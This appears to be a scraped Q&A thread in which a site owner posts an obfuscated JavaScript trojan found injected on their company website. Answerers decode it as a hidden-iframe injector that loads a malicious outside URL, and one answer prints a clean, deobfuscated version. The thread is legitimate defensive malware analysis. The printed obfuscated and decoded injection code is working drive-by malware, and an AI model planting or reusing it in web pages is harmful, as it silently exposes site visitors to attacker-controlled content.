JavaScript analysis of trojans

Question

JavaScript analysis of trojans

I recently played with dedicated JavaScript and began to believe that I could not come across a piece of JavaScript that I could not debug.

Well, I was pleasantly surprised and pissed off today when we discovered several Trojans for redirecting JavaScript on our company website.

Most of the code we found, I was able to easily parse and use standard escaping to obfuscate the code function.

But among the code that we found, the code below completely stopped me on what it was doing. (The only part I can work with is that it does the replacement of some parameters).

So someone please be kind enough to parse the following code for me? I would like to know exactly what is happening ...

<script> function yJ() {}; this.sMZ = "sMZ"; yJ.prototype = { w: function () { var rJ = 13390; this.m = "m"; this.fP = ''; this.q = "q"; this.oJ = ""; var vS = function () { return 'vS' }; var d = 'replace'; var qB = ""; x = ''; var s = document; var xZ = "xZ"; mC = ''; var dV = "dV"; var b = window; this.p = false; this.kX = ''; nP = "nP"; var zE = ""; this.nU = false; var yV = function () { return 'yV' }; String.prototype.gT = function (l, v) { return this[d](l, v) }; this.pC = ''; var qV = false; var fPU = new Array(); h = ""; var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, ''); var xV = 43258; sT = ''; var mV = ''; this.wJ = "wJ"; var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, ''); var xB = ''; wI = "wI"; oT = false; var nQ = 49042; try { zI = ''; var bF = new Array(); var aY = function () { return 'aY' }; var rN = false; rF = ""; var cX = function () { return 'cX' }; var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, ''); this.rL = ''; var vH = function () { return 'vH' }; var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, ''); yD = ""; var eA = ''; var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, ''); vZ = ''; this.bG = ""; this.vL = false; var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, ''); gI = ''; dVL = "dVL"; var n = 'cZrzeZaZtze.Ele;m;eSnzt;'.gT(/[;SZz\.]/g, ''); lH = ""; kD = "kD"; this.pH = false; var k = 's9ric9'.gT(/[9Ni~O]/g, ''); var vB = ''; var kH = function () { return 'kH' }; var qH = new Array(); aD = ''; this.eQ = false; var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, ''); var cT = ''; var kL = function () { return 'kL' }; var bR = new Array(); this.cP = 22454; var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, ''); lG = ''; tG = 7587; hV = ''; this.oR = "oR"; var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, ''); var dC = function () {}; var eR = new Date(); var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, ''); uM = ""; var i = function () {}; this.cI = ""; tU = false; function qN() {}; xL = 57256; var c = this.a(); this.eL = ''; var rY = function () {}; fG = false; nO = false; this.j = ""; this.iQ = 5330; var sY = function () {}; var u = document[n](bQ); this.tH = false; zX = ""; u[r][o] = dH; var kV = "kV"; pN = ''; var yG = new Array(); this.nOE = 818; u[z](k, c); this.bQK = ""; var yU = 15629; var sM = new Array(); var eY = "eY"; var qP = ''; s[y][e](u); var lU = "lU"; var zR = false; var xS = ""; iX = 34795; function pO() {}; this.gM = ""; } catch (g) { var xI = false; this.gO = false; this.iZ = false; this.iU = false; var mQ = new Date(); var qF = function () {}; s.write(f); var tS = "tS"; function aR() {}; nA = "nA"; var xT = new Date(); mZ = false; var gN = new Array(); var wE = this; var eB = 3562; this.qE = "qE"; this.cS = false; this.vK = false; qEJ = false; this.hW = false; b[sV](function () { function bI() {}; hJ = ""; var kVQ = "kVQ"; var iG = ""; var eBS = new Array(); rA = ""; wE.w(); jY = ""; var hB = "hB"; var iZF = ''; qY = ""; jYG = ""; uK = 30969; var qD = "qD"; }, 326); this.qC = ""; var aX = function () {}; var cN = ""; } gB = false; var fF = false; this.hX = false; }, a: function () { rH = "rH"; this.bV = ''; var qW = ""; return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, ''); var sMS = new Array(); this.wL = false; uS = "uS"; function pI() {}; } }; var uI = false; var kN = new yJ(); this.aQ = "aQ"; kN.w(); hT = 15101; </script>

+7

javascript debugging obfuscation trojan

Maxim Gershkovich Jul 20 '10 at 8:06

source share

3 answers

It adds an invisible iFrame to the following URL to your site:

 <iframe style="visibility: hidden;" src="http://fancycake.net/.ph/1/"></iframe>

The fancycake website is marked as attacked and malicious in Firefox

+4

Erik Jul 20 '10 at 8:13

source share

Run it in the JavaScript debugger; in the end, the code decompiles itself and tries to start. I suggest using the latest version of FireFox, possibly on a Linux box, to be safe.

+1

Aaron digulla Jul 20 '10 at 8:21

source share

Jesse dhillon · Accepted Answer · 2010-07-20T08:33:10+0000

It includes http://fancycake.xxx/something , and this is the line where you can see it:

 return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');

You see how every odd character taken out of this line forms a URL. I did not run this, so I'm not sure under what conditions he does it, but you can see that String.replace been renamed to String.gT and a regular expression is sent against characters that make the string get confused. If you apply the same method, choosing odd characters, you can see that there is a hidden iframe, some javascript, setAttribute event handlers, etc.:

 var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, ''); var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, ''); var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');

This is how String.replace smoothed:

 var d = 'replace'; ... String.prototype.gT = function (l, v) { return this[d](l, v) };

In the context of this function, this is the string in which gT is gT , and d is the replace string. In the string prototype, this['replace'] returns the replace() method, which is then called with two arguments in gT . Then the result is returned.

Update

I converted the script like this:

Replaces all calls to string.gT() with their simple forms.
Removed any variables that are not referenced.
A function has some common sense names.

This is the result, it should be pretty clear how it works now:

 function FancyCake() {}; FancyCake.prototype = { embed: function () { var d = 'replace'; var s = document; var b = window; var sV = 'setTimeout'; var f = "<html ><head ></head><body ></body></html>"; try { zI = ''; var bF = new Array(); var y = 'body'; var r = 'style'; var bQ = 'iframe'; var t = 'write'; var n = 'createElement'; var k = 'src'; var z = 'setAttribute'; var dH = 'hidden'; var o = 'visibility'; var e = 'appendChild'; var c = this.getUrl(); var u = document[n](bQ); u[r][o] = dH; u[z](k, c); s[y][e](u); } catch (e) { console.error(e); s.write(f); var cake = this; b[sV](function () { cake.embed(); }, 326); } }, getUrl: function () { return "http://fancycake.net/.ph/1/"; } }; var cake = new FancyCake(); cake.embed();

JavaScript analysis of trojans

More articles: